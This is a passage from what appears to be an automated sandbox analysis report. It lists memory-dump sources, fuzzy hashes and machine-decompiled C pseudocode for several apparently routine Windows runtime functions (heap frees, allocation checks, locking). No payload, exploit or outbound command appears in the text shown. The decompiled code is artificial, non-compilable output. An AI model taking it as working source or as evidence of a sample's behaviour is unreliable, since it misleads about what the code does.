                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                              • Instruction ID: f42b0234af3c5491a956027c0dff03d10ad5ef8a8fa968492c26bc57c0599a4f
                                                              • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                              • Instruction Fuzzy Hash: A7217C72600A41DBD735CF0AC580A76B7E6EB94B10F2485EEE94587651E730BD00EB80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 77%
                                                              			E04B99240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                              				intOrPtr _t33;
                                                              				intOrPtr _t37;
                                                              				intOrPtr _t41;
                                                              				intOrPtr* _t46;
                                                              				void* _t48;
                                                              				intOrPtr _t50;
                                                              				intOrPtr* _t60;
                                                              				void* _t61;
                                                              				intOrPtr _t62;
                                                              				intOrPtr _t65;
                                                              				void* _t66;
                                                              				void* _t68;
                                                              
                                                              				_push(0xc);
                                                              				_push(0x4c6f708);
                                                              				E04BED08C(__ebx, __edi, __esi);
                                                              				_t65 = __ecx;
                                                              				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                                              				if( *(__ecx + 0x24) != 0) {
                                                              					_push( *(__ecx + 0x24));
                                                              					E04BD95D0();
                                                              					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                                              				}
                                                              				L6();
                                                              				L6();
                                                              				_push( *((intOrPtr*)(_t65 + 0x28)));
                                                              				E04BD95D0();
                                                              				_t33 =  *0x4c884c4; // 0x0
                                                              				L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                                              				_t37 =  *0x4c884c4; // 0x0
                                                              				L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                                              				_t41 =  *0x4c884c4; // 0x0
                                                              				E04BB2280(L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4c886b4);
                                                              				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                              				_t46 = _t65 + 0xe8;
                                                              				_t62 =  *_t46;
                                                              				_t60 =  *((intOrPtr*)(_t46 + 4));
                                                              				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                                              					_t61 = 3;
                                                              					asm("int 0x29");
                                                              					_push(_t65);
                                                              					_t66 = _t61;
                                                              					_t23 = _t66 + 0x14; // 0x8df8084c
                                                              					_push( *_t23);
                                                              					E04BD95D0();
                                                              					_t24 = _t66 + 0x10; // 0x89e04d8b
                                                              					_push( *_t24);
                                                              					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                                              					_t48 = E04BD95D0();
                                                              					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                                              					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                                              					return _t48;
                                                              				} else {
                                                              					 *_t60 = _t62;
                                                              					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                                              					 *(_t68 - 4) = 0xfffffffe;
                                                              					E04B99325();
                                                              					_t50 =  *0x4c884c4; // 0x0
                                                              					return E04BED0D1(L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                                              				}
                                                              			}
















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: ef64a7d6cc501b14629001245e47fc9016d1e77505f33b67a984eee397aec517
                                                              • Instruction ID: cfb8936afb453423e7876f5c9b861d34dbc4570b2a107a89a34587cae6e4061a
                                                              • Opcode Fuzzy Hash: ef64a7d6cc501b14629001245e47fc9016d1e77505f33b67a984eee397aec517
                                                              • Instruction Fuzzy Hash: D8214872040640EFDB61EF28CA50F69B7F9FF48708F5545ACA0498BAA2CB74F941CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 54%
                                                              			E04BCB390(void* __ecx, intOrPtr _a4) {
                                                              				signed int _v8;
                                                              				signed char _t12;
                                                              				signed int _t16;
                                                              				signed int _t21;
                                                              				void* _t28;
                                                              				signed int _t30;
                                                              				signed int _t36;
                                                              				signed int _t41;
                                                              
                                                              				_push(__ecx);
                                                              				_t41 = _a4 + 0xffffffb8;
                                                              				E04BB2280(_t12, 0x4c88608);
                                                              				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                                              				asm("sbb edi, edi");
                                                              				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                                              				_v8 = _t36;
                                                              				asm("lock cmpxchg [ebx], ecx");
                                                              				_t30 = 1;
                                                              				if(1 != 1) {
                                                              					while(1) {
                                                              						_t21 = _t30 & 0x00000006;
                                                              						_t16 = _t30;
                                                              						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                                              						asm("lock cmpxchg [edi], esi");
                                                              						if(_t16 == _t30) {
                                                              							break;
                                                              						}
                                                              						_t30 = _t16;
                                                              					}
                                                              					_t36 = _v8;
                                                              					if(_t21 == 2) {
                                                              						_t16 = E04BD00C2(0x4c88608, 0, _t28);
                                                              					}
                                                              				}
                                                              				if(_t36 != 0) {
                                                              					_t16 = L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                                              				}
                                                              				return _t16;
                                                              			}












                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea8dd4c8638716e8240846a3a6680704f63cebaac80957f9179e3fb5f95170ce
                                                              • Instruction ID: 7b2dbad07ee4188a2f6864c46209cf8b87a89396c9ceacec5adf55bc72dada2e
                                                              • Opcode Fuzzy Hash: ea8dd4c8638716e8240846a3a6680704f63cebaac80957f9179e3fb5f95170ce
                                                              • Instruction Fuzzy Hash: 1A1121763152109BDB28AE259D82A6B7397EBC5234B2841ADDA169B680D932BC02C6D4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E04C146A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                                              				signed short* _v8;
                                                              				unsigned int _v12;
                                                              				intOrPtr _v16;
                                                              				signed int _t22;
                                                              				signed char _t23;
                                                              				short _t32;
                                                              				void* _t38;
                                                              				char* _t40;
                                                              
                                                              				_v12 = __edx;
                                                              				_t29 = 0;
                                                              				_v8 = __ecx;
                                                              				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                                              				_t38 = L04BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                                              				if(_t38 != 0) {
                                                              					_t40 = _a4;
                                                              					 *_t40 = 1;
                                                              					E04BDF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                                              					_t22 = _v12 >> 1;
                                                              					_t32 = 0x2e;
                                                              					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                                              					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                                              					_t23 = E04BCD268(_t38, 1);
                                                              					asm("sbb al, al");
                                                              					 *_t40 =  ~_t23 + 1;
                                                              					L04BB77F0(_v16, 0, _t38);
                                                              				} else {
                                                              					 *_a4 = 0;
                                                              					_t29 = 0xc0000017;
                                                              				}
                                                              				return _t29;
                                                              			}












                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                              • Instruction ID: 27dc3ecce757e85b50152d1ad2c8114f18c0ae0bcc8586809f234ba97a7c4b3b
                                                              • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                              • Instruction Fuzzy Hash: AA11C272904208BBDB059F5DD8808BEB7B9EF95314F1080AAF9848B351DA319D55D7A4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 94%
                                                              			E04BA766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                              				char _v8;
                                                              				void* _t22;
                                                              				void* _t24;
                                                              				intOrPtr _t29;
                                                              				intOrPtr* _t30;
                                                              				void* _t42;
                                                              				intOrPtr _t47;
                                                              
                                                              				_push(__ecx);
                                                              				_t36 =  &_v8;
                                                              				if(E04BCF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                                              					L10:
                                                              					_t22 = 0;
                                                              				} else {
                                                              					_t24 = _v8 + __ecx;
                                                              					_t42 = _t24;
                                                              					if(_t24 < __ecx) {
                                                              						goto L10;
                                                              					} else {
                                                              						if(E04BCF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                                              							goto L10;
                                                              						} else {
                                                              							_t29 = _v8 + _t42;
                                                              							if(_t29 < _t42) {
                                                              								goto L10;
                                                              							} else {
                                                              								_t47 = _t29;
                                                              								_t30 = _a16;
                                                              								if(_t30 != 0) {
                                                              									 *_t30 = _t47;
                                                              								}
                                                              								if(_t47 == 0) {
                                                              									goto L10;
                                                              								} else {
                                                              									_t22 = L04BB4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t22;
                                                              			}











                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                              • Instruction ID: 200aa23b315f85857eff6bc50902622b3883adfc4ea47677cb9790dc13738482
                                                              • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                              • Instruction Fuzzy Hash: 1201D432718518AFD720AE5ECC40F6B77ADEB84760B2805A4B908CB241DE30EC1197A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 69%
                                                              			E04B99080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                              				intOrPtr* _t51;
                                                              				intOrPtr _t59;
                                                              				signed int _t64;
                                                              				signed int _t67;
                                                              				signed int* _t71;
                                                              				signed int _t74;
                                                              				signed int _t77;
                                                              				signed int _t82;
                                                              				intOrPtr* _t84;
                                                              				void* _t85;
                                                              				intOrPtr* _t87;
                                                              				void* _t94;
                                                              				signed int _t95;
                                                              				intOrPtr* _t97;
                                                              				signed int _t99;
                                                              				signed int _t102;
                                                              				void* _t104;
                                                              
                                                              				_push(__ebx);
                                                              				_push(__esi);
                                                              				_push(__edi);
                                                              				_t97 = __ecx;
                                                              				_t102 =  *(__ecx + 0x14);
                                                              				if((_t102 & 0x02ffffff) == 0x2000000) {
                                                              					_t102 = _t102 | 0x000007d0;
                                                              				}
                                                              				_t48 =  *[fs:0x30];
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                              					_t102 = _t102 & 0xff000000;
                                                              				}
                                                              				_t80 = 0x4c885ec;
                                                              				E04BB2280(_t48, 0x4c885ec);
                                                              				_t51 =  *_t97 + 8;
                                                              				if( *_t51 != 0) {
                                                              					L6:
                                                              					return E04BAFFB0(_t80, _t97, _t80);
                                                              				} else {
                                                              					 *(_t97 + 0x14) = _t102;
                                                              					_t84 =  *0x4c8538c; // 0x77f068c8
                                                              					if( *_t84 != 0x4c85388) {
                                                              						_t85 = 3;
                                                              						asm("int 0x29");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						asm("int3");
                                                              						_push(0x2c);
                                                              						_push(0x4c6f6e8);
                                                              						E04BED0E8(0x4c885ec, _t97, _t102);
                                                              						 *((char*)(_t104 - 0x1d)) = 0;
                                                              						_t99 =  *(_t104 + 8);
                                                              						__eflags = _t99;
                                                              						if(_t99 == 0) {
                                                              							L13:
                                                              							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                              							if(__eflags == 0) {
                                                              								E04C688F5(_t80, _t85, 0x4c85388, _t99, _t102, __eflags);
                                                              							}
                                                              						} else {
                                                              							__eflags = _t99 -  *0x4c886c0; // 0x2e607b0
                                                              							if(__eflags == 0) {
                                                              								goto L13;
                                                              							} else {
                                                              								__eflags = _t99 -  *0x4c886b8; // 0x0
                                                              								if(__eflags == 0) {
                                                              									goto L13;
                                                              								} else {
                                                              									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                              									__eflags =  *((char*)(_t59 + 0x28));
                                                              									if( *((char*)(_t59 + 0x28)) == 0) {
                                                              										E04BB2280(_t99 + 0xe0, _t99 + 0xe0);
                                                              										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                                              										__eflags =  *((char*)(_t99 + 0xe5));
                                                              										if(__eflags != 0) {
                                                              											E04C688F5(0x4c885ec, _t85, 0x4c85388, _t99, _t102, __eflags);
                                                              										} else {
                                                              											__eflags =  *((char*)(_t99 + 0xe4));
                                                              											if( *((char*)(_t99 + 0xe4)) == 0) {
                                                              												 *((char*)(_t99 + 0xe4)) = 1;
                                                              												_push(_t99);
                                                              												_push( *((intOrPtr*)(_t99 + 0x24)));
                                                              												E04BDAFD0();
                                                              											}
                                                              											while(1) {
                                                              												_t71 = _t99 + 8;
                                                              												 *(_t104 - 0x2c) = _t71;
                                                              												_t80 =  *_t71;
                                                              												_t95 = _t71[1];
                                                              												 *(_t104 - 0x28) = _t80;
                                                              												 *(_t104 - 0x24) = _t95;
                                                              												while(1) {
                                                              													L19:
                                                              													__eflags = _t95;
                                                              													if(_t95 == 0) {
                                                              														break;
                                                              													}
                                                              													_t102 = _t80;
                                                              													 *(_t104 - 0x30) = _t95;
                                                              													 *(_t104 - 0x24) = _t95 - 1;
                                                              													asm("lock cmpxchg8b [edi]");
                                                              													_t80 = _t102;
                                                              													 *(_t104 - 0x28) = _t80;
                                                              													 *(_t104 - 0x24) = _t95;
                                                              													__eflags = _t80 - _t102;
                                                              													_t99 =  *(_t104 + 8);
                                                              													if(_t80 != _t102) {
                                                              														continue;
                                                              													} else {
                                                              														__eflags = _t95 -  *(_t104 - 0x30);
                                                              														if(_t95 !=  *(_t104 - 0x30)) {
                                                              															continue;
                                                              														} else {
                                                              															__eflags = _t95;
                                                              															if(_t95 != 0) {
                                                              																_t74 = 0;
                                                              																 *(_t104 - 0x34) = 0;
                                                              																_t102 = 0;
                                                              																__eflags = 0;
                                                              																while(1) {
                                                              																	 *(_t104 - 0x3c) = _t102;
                                                              																	__eflags = _t102 - 3;
                                                              																	if(_t102 >= 3) {
                                                              																		break;
                                                              																	}
                                                              																	__eflags = _t74;
                                                              																	if(_t74 != 0) {
                                                              																		L49:
                                                              																		_t102 =  *_t74;
                                                              																		__eflags = _t102;
                                                              																		if(_t102 != 0) {
                                                              																			_t102 =  *(_t102 + 4);
                                                              																			__eflags = _t102;
                                                              																			if(_t102 != 0) {
                                                              																				 *0x4c8b1e0(_t74, _t99);
                                                              																				 *_t102();
                                                              																			}
                                                              																		}
                                                              																		do {
                                                              																			_t71 = _t99 + 8;
                                                              																			 *(_t104 - 0x2c) = _t71;
                                                              																			_t80 =  *_t71;
                                                              																			_t95 = _t71[1];
                                                              																			 *(_t104 - 0x28) = _t80;
                                                              																			 *(_t104 - 0x24) = _t95;
                                                              																			goto L19;
                                                              																		} while (_t74 == 0);
                                                              																		goto L49;
                                                              																	} else {
                                                              																		_t82 = 0;
                                                              																		__eflags = 0;
                                                              																		while(1) {
                                                              																			 *(_t104 - 0x38) = _t82;
                                                              																			__eflags = _t82 -  *0x4c884c0;
                                                              																			if(_t82 >=  *0x4c884c0) {
                                                              																				break;
                                                              																			}
                                                              																			__eflags = _t74;
                                                              																			if(_t74 == 0) {
                                                              																				_t77 = E04C69063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                              																				__eflags = _t77;
                                                              																				if(_t77 == 0) {
                                                              																					_t74 = 0;
                                                              																					__eflags = 0;
                                                              																				} else {
                                                              																					_t74 = _t77 + 0xfffffff4;
                                                              																				}
                                                              																				 *(_t104 - 0x34) = _t74;
                                                              																				_t82 = _t82 + 1;
                                                              																				continue;
                                                              																			}
                                                              																			break;
                                                              																		}
                                                              																		_t102 = _t102 + 1;
                                                              																		continue;
                                                              																	}
                                                              																	goto L20;
                                                              																}
                                                              																__eflags = _t74;
                                                              															}
                                                              														}
                                                              													}
                                                              													break;
                                                              												}
                                                              												L20:
                                                              												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                                              												 *((char*)(_t99 + 0xe5)) = 1;
                                                              												 *((char*)(_t104 - 0x1d)) = 1;
                                                              												goto L21;
                                                              											}
                                                              										}
                                                              										L21:
                                                              										 *(_t104 - 4) = 0xfffffffe;
                                                              										E04B9922A(_t99);
                                                              										_t64 = E04BB7D50();
                                                              										__eflags = _t64;
                                                              										if(_t64 != 0) {
                                                              											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              										} else {
                                                              											_t67 = 0x7ffe0386;
                                                              										}
                                                              										__eflags =  *_t67;
                                                              										if( *_t67 != 0) {
                                                              											_t67 = E04C68B58(_t99);
                                                              										}
                                                              										__eflags =  *((char*)(_t104 - 0x1d));
                                                              										if( *((char*)(_t104 - 0x1d)) != 0) {
                                                              											__eflags = _t99 -  *0x4c886c0; // 0x2e607b0
                                                              											if(__eflags != 0) {
                                                              												__eflags = _t99 -  *0x4c886b8; // 0x0
                                                              												if(__eflags == 0) {
                                                              													_t94 = 0x4c886bc;
                                                              													_t87 = 0x4c886b8;
                                                              													goto L27;
                                                              												} else {
                                                              													__eflags = _t67 | 0xffffffff;
                                                              													asm("lock xadd [edi], eax");
                                                              													if(__eflags == 0) {
                                                              														E04B99240(_t80, _t99, _t99, _t102, __eflags);
                                                              													}
                                                              												}
                                                              											} else {
                                                              												_t94 = 0x4c886c4;
                                                              												_t87 = 0x4c886c0;
                                                              												L27:
                                                              												E04BC9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                                              											}
                                                              										}
                                                              									} else {
                                                              										goto L13;
                                                              									}
                                                              								}
                                                              							}
                                                              						}
                                                              						return E04BED130(_t80, _t99, _t102);
                                                              					} else {
                                                              						 *_t51 = 0x4c85388;
                                                              						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                                              						 *_t84 = _t51;
                                                              						 *0x4c8538c = _t51;
                                                              						goto L6;
                                                              					}
                                                              				}
                                                              			}





















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e847ff99a4e681d2de607e2a8234594ba19b5b3616840c160a69086ccbd351b
                                                              • Instruction ID: 25403085aa12669bc180bc3c692dc37c4cf6b487c58ee05d8a44290aa7294eb6
                                                              • Opcode Fuzzy Hash: 5e847ff99a4e681d2de607e2a8234594ba19b5b3616840c160a69086ccbd351b
                                                              • Instruction Fuzzy Hash: 9A01F4B2601210AFE7189F24D840B217BE9EF41328F2140BEE111DB791C3B4FC41CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 46%
                                                              			E04C2C450(intOrPtr* _a4) {
                                                              				signed char _t25;
                                                              				intOrPtr* _t26;
                                                              				intOrPtr* _t27;
                                                              
                                                              				_t26 = _a4;
                                                              				_t25 =  *(_t26 + 0x10);
                                                              				if((_t25 & 0x00000003) != 1) {
                                                              					_push(0);
                                                              					_push(0);
                                                              					_push(0);
                                                              					_push( *((intOrPtr*)(_t26 + 8)));
                                                              					_push(0);
                                                              					_push( *_t26);
                                                              					E04BD9910();
                                                              					_t25 =  *(_t26 + 0x10);
                                                              				}
                                                              				if((_t25 & 0x00000001) != 0) {
                                                              					_push(4);
                                                              					_t7 = _t26 + 4; // 0x4
                                                              					_t27 = _t7;
                                                              					_push(_t27);
                                                              					_push(5);
                                                              					_push(0xfffffffe);
                                                              					E04BD95B0();
                                                              					if( *_t27 != 0) {
                                                              						_push( *_t27);
                                                              						E04BD95D0();
                                                              					}
                                                              				}
                                                              				_t8 = _t26 + 0x14; // 0x14
                                                              				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                                              					L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                                              				}
                                                              				_push( *_t26);
                                                              				E04BD95D0();
                                                              				return L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                                              			}







                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                              • Instruction ID: ef286b9356bd0cbb232a2fd8b342b99a4a561adf4a92806edb949e832e56bc13
                                                              • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                              • Instruction Fuzzy Hash: 5F01DEB2140A05BFE721AF25CD80EB7FB6EFF94798F004165F24446560DB62BCA0CAE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 86%
                                                              			E04C64015(signed int __eax, signed int __ecx) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				signed char _t10;
                                                              				signed int _t28;
                                                              
                                                              				_push(__ecx);
                                                              				_t28 = __ecx;
                                                              				asm("lock xadd [edi+0x24], eax");
                                                              				_t10 = (__eax | 0xffffffff) - 1;
                                                              				if(_t10 == 0) {
                                                              					_t1 = _t28 + 0x1c; // 0x1e
                                                              					E04BB2280(_t10, _t1);
                                                              					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                              					E04BB2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4c886ac);
                                                              					E04B9F900(0x4c886d4, _t28);
                                                              					E04BAFFB0(0x4c886ac, _t28, 0x4c886ac);
                                                              					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                                              					E04BAFFB0(0, _t28, _t1);
                                                              					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                                              					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                                              						L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                              					}
                                                              					_t10 = L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                              				}
                                                              				return _t10;
                                                              			}








                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aba02cd4d195e23efc8e1826f5a91301eeead7cd481cb2631e57e3815e5d1cf5
                                                              • Instruction ID: a6296fb9c60afa7bd56bfb11c80d47b97f1a8899f7e91a2872d2f99e7c41f813
                                                              • Opcode Fuzzy Hash: aba02cd4d195e23efc8e1826f5a91301eeead7cd481cb2631e57e3815e5d1cf5
                                                              • Instruction Fuzzy Hash: 2D018F722419457FE615BB69CD84E63B7ACEF85668B0006A9B508C7A11CB64FC11CAE4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 61%
                                                              			E04C514FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                              				signed int _v8;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				short _v54;
                                                              				char _v60;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed char* _t21;
                                                              				intOrPtr _t27;
                                                              				intOrPtr _t33;
                                                              				intOrPtr _t34;
                                                              				signed int _t35;
                                                              
                                                              				_t32 = __edx;
                                                              				_t27 = __ebx;
                                                              				_v8 =  *0x4c8d360 ^ _t35;
                                                              				_t33 = __edx;
                                                              				_t34 = __ecx;
                                                              				E04BDFA60( &_v60, 0, 0x30);
                                                              				_v20 = _a4;
                                                              				_v16 = _a8;
                                                              				_v28 = _t34;
                                                              				_v24 = _t33;
                                                              				_v54 = 0x1034;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t21 = 0x7ffe0388;
                                                              				} else {
                                                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              				}
                                                              				_push( &_v60);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t21 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                              			}


















                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7c70a070be44ca73511e68392c62de148679c96fb589a64f884fe01e30e15fb
                                                              • Instruction ID: f20facfe60237b8e7226ac5e1a524af8631f8aea62f8b7eb88c768c87860ad8e
                                                              • Opcode Fuzzy Hash: d7c70a070be44ca73511e68392c62de148679c96fb589a64f884fe01e30e15fb
                                                              • Instruction Fuzzy Hash: 41019271E01258AFDB04DFA9D845FAEB7B8EF44710F44409AF905EB280EA74EE41CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 61%
                                                              			E04C5138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                              				signed int _v8;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				short _v54;
                                                              				char _v60;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed char* _t21;
                                                              				intOrPtr _t27;
                                                              				intOrPtr _t33;
                                                              				intOrPtr _t34;
                                                              				signed int _t35;
                                                              
                                                              				_t32 = __edx;
                                                              				_t27 = __ebx;
                                                              				_v8 =  *0x4c8d360 ^ _t35;
                                                              				_t33 = __edx;
                                                              				_t34 = __ecx;
                                                              				E04BDFA60( &_v60, 0, 0x30);
                                                              				_v20 = _a4;
                                                              				_v16 = _a8;
                                                              				_v28 = _t34;
                                                              				_v24 = _t33;
                                                              				_v54 = 0x1033;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t21 = 0x7ffe0388;
                                                              				} else {
                                                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              				}
                                                              				_push( &_v60);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t21 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
